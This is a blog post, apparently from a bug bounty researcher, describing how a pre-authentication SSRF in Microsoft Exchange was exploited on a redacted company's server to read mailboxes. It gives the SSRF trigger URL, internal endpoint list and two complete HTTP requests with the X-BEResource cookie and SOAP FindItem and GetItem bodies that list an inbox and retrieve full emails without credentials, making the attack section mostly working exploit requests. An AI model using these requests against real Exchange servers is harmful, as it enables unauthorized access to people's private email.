Pre-Auth SSRF To Full MailBox Access (Microsoft Exchange Server Exploit)

Vanshal Gaur
2 min readOct 2, 2021

--

Recently, while testing one of the popular Indian company (for the sake of confidentiality lets call it redacted.com). I found out that on one of the subdomains, “Outlook” was running. Also there were other subdomains related to the same service.

“autodiscover.redacted.com”
“mail.redacted.com”
“legacy.redacted.com”

One of these subdomains was showing the “Exchange Server Page”. With the version information and other details like Username, SID etc.

This seems interesting, because i previously heard about “Exchange Server Exploits by Orange Tsai”

I was sure that vulnerable version of Exchange Server was running so, i read some blogs about this exploit to understand the Source Code Analysis and exploitation steps. Every Blog has different way to exploit this vulnerability, i combined my payloads from different resources.

It is an “Pre-auth SSRF TO RCE” But i was unable to get the RCE due to some reasons.

Resources:
https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Exploitation:

On reading the blogs i figured that Pre-Auth SSRF can be triggered by
Vuln URL: (Here the application will send the internal request to “/mapi/nspi”)

 https://autodiscover.redacted.com/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com

Note: To Understand how the SSRF is triggered, Read the Source-Code Analysis of Microsoft Exchange by PeterJson from one of the above mentioned blogs. The SSRF was discovered by Source-Code Analysis and Exploit URL is publicly available.

So far, SSRF GET Requests can be sent using the given URL.

Some other interesting internal endpoints:

/powershell
/mapi/emsmdb
/autodiscover/autodiscover.xml
/ews/exchange.asmx
/owa/auth/Current/
/ecp/default.flt
/ecp/favicon.ico

/ews/exchange.asmx can be used to access the emails.

The Valid XML formats and Official Documentation can be found at:

https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/finditem-operation

To read the Emails from Exchange Server, A request to “/ecp/favicon.ico” (non-ssrf) must be sent with “X-BEResource” Cookie Containing “Exchange Server Address” and SSRF Endpoint(/ews/exchange.asmx).

POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1128<?xml version='1.0' encoding='utf-8'?>
            <soap:Envelope
             xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
             xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
             xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
             xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
              <soap:Header>
                  <t:RequestServerVersion Version="Exchange2016" />
              </soap:Header>
              <soap:Body>
                <m:FindItem Traversal='Shallow'>
                  <m:ItemShape>
                    <t:BaseShape>AllProperties</t:BaseShape>
                  </m:ItemShape>
                  <m:ParentFolderIds>
                    <t:DistinguishedFolderId Id='inbox'>
                      <t:Mailbox>
                        <t:EmailAddress>info@redacted.com</t:EmailAddress>
                      </t:Mailbox>
                    </t:DistinguishedFolderId>
                  </m:ParentFolderIds>
                </m:FindItem>
              </soap:Body>
            </soap:Envelope>

Email Details of the given address can be seen in response. It contains email, subject, date, attachments. but not the Conversation of the email.

To Read the Conversations ItemId and ChangeKey is required both of which can be found in the response of the above request.

Lastly, By crafting another request containing the ItemId and Changekey of the conversation we want to read, we can access the Full Email.

Payload used to retrieve individual emails without authentication.
POST /ecp/favicon.ico HTTP/1.1
Host: autodiscover.redacted.com
Content-Type: text/xml
Cookie: X-BEResource=[:[@redacted.com:444/ews/exchange.asmx#~1
Content-Length: 1062<?xml version='1.0' encoding='utf-8'?>
            <soap:Envelope
             xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'
             xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'
             xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'
             xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
              <soap:Header>
                  <t:RequestServerVersion Version="Exchange2016" />
              </soap:Header>
              <soap:Body>
                <m:GetItem Traversal='Shallow'>
                  <m:ItemShape>
                    <t:BaseShape>AllProperties</t:BaseShape>
                  </m:ItemShape>
<m:ItemIds>
                  <t:ItemId Id="ItemID" ChangeKey="Changekey" />
</m:ItemIds>
                </m:GetItem>
              </soap:Body>
            </soap:Envelope>
Infosec
Bug Bounty
Hacking
Cybersecurity
Microsoft

--

--

Vanshal Gaur

Written by Vanshal Gaur

117 Followers

18 Y/o | OSCP | OSWE | Security Researcher | Twitter: VanshalG

More from Vanshal Gaur

See all from Vanshal Gaur

Recommended from Medium

Lists

A series of icons from the John Lewis icon library
An aerial view of a desktop, with digital devices, a command key, and paperclips
A scattering of pixels on a grid

Icon Design

30 stories107 saves

Tech & Tools

15 stories54 saves

Productivity

230 stories127 saves

Medium Publications Accepting Story Submissions

154 stories761 saves
See more recommendations

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams